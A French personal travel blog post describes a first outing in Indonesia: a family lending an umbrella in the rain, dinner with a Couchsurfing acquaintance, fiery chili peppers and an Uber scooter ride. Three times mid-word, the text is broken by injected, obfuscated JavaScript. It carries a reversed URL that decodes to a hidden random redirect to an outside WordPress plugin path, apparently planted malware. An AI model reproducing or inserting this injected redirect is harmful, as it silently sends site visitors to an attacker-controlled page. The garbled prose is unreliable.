Arrivée en Indonésie

Ça y’est, c’est mon deuxième jour en Indonésie. Après 20h d’avion et quelques heures de voitures / bus, j’me retrouve à dormir dans mon AirBNB. Entre deux rêves, je me rends compte que je suis sensé rejoindre une fille avec qui je vais voyager dans une semaine. Elle s’appelle Rosyi, on s’est capté sur couchsurfing et on a décidé de faire l’indonésie ensemble pendant quelques semaines. ?

Du coup ça me réveille, j’me rends compte que ça fait 2h qu’elle m’attend au point de rendez-vous, bien joué, j’suis en retard. J’lui explique juste que j’étais éclaté mais j’arrive. Avant que je m’endorme on avait décidé de se retrouver dans un centre commercial près de mon Airbnb. J’commence à y aller à pied, et après environ 20 secondes de marche, une grosse pluie démarre. J’me dis que ça va durer quelques minutes, j’décide de me poser sous un abri.

Après 10 minutes la pluie ne se calme pas, une famille en face vois que je galère et m’invite à prendre un verre d’eau. On passe un peu de temps ensemble, et ils me laissent quelque minutes dans leur cour où j’en profite pour prendre quelques photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.

La cour de la Famille Parapluie

C’est juste une pancarte dans la cour de la famille parapluie

Ils reviennent avec un parapluie et me le prête, je dois le rendre le lendemain. J’reprends ma route tranquillement. Après 15 minutes de marche, je me retrouve au SetiaButi One, le centre commercial du quartier. C’est un grand centre commercial, comme celle des grandes villes que j’avais pu voir avant, y’a juste plus de restaurants mais sinon c’est pareil.

Je me réveille

Il est 18h, on décide d’aller manger. On s’écarte de ce centre commercial pour aller manger dans un petit boui-boui (je sais pas comment dire autrement) au bord de la route. Ici il y en a un peu partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout, ils vendent à boire, à manger, des trucs sucrés, salés, juste des fruits, et ça a l’air trop bon. ❤ On commande, je prends des nouilles, je sais pas à quoi mais des nouilles s’il vous plaît.

On papote, le courant passe plutôt bien même si ma compréhension de l’anglais est brouillée par le bruit des voitures et des scooters autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour. Le plat arrive, avec un verre de thé glacé. Les nouilles sont super bonnes, je reconnais le poulet, les concombres, les carottes et les petites piments, le reste j’en sais rien. Peut-être du curry ? Pareil pour le thé qui est trooooop bon, c’est comme le thé glacé en france, mais avec une sorte de cassonade et un goût que je connais pas, ça m’a fait penser au goût d’une fleur (peut-être le goût du GHB hihihihihihi).

Le repas se passe bien, c’est épicé mais bon jusque là j’arrive à camoufler ma fragilité. Et je demande à Rosyi si les petits piments dans mon assiette sont forts, elle me dit que ça va c’est bon. J’en croque un, confiant. Je prends feu. C’était la première fois que je mangeais un truc aussi fort. Ma bouche de petit occidental pleurait et je ne sentais plus rien du reste du repas.

L’aventure inattendue

Ça se termine et on décide d’aller boire un verre ensemble dans un autre coin de la ville. Je vois qu’elle commande un truc sur son téléphone, j’me dis peut-être un taxi, à ce moment-là je suis serein. 5 minutes passent, un mec en scooter arrive, me donne un casque et go. 4 heures plus tôt j’étais effrayé par le trafic. Mais finalement ça va, j’ai l’impression qu’il n’y a pas vraiment de code de la route, mais que les gens font attention les uns aux autres du coup ça va.

Une fois arrivé, on s’pose dans un bar, lamba, pas vraiment différent de la France. On papote elle m’apprend que araignée se dit « labalaba »(je crois) en Indonésien. Et on termine tranquillement la soirée là-dessus, où je rentre tranquillement à dos de Uber scooter.

Le fameux parapluie de la famille parapluie.

Le fameux parapluie que je dois rendre aujourd’hui.

J’ai accéléré  la fin, mais j’écris ça le lendemain matin, il est 7h et quelques et je meurs de faim. J’décalle ! ???

2 semaines en Indonésie et Publication du Blog

Article Suivant

Départ imminent, je me prépare.

Article Précédent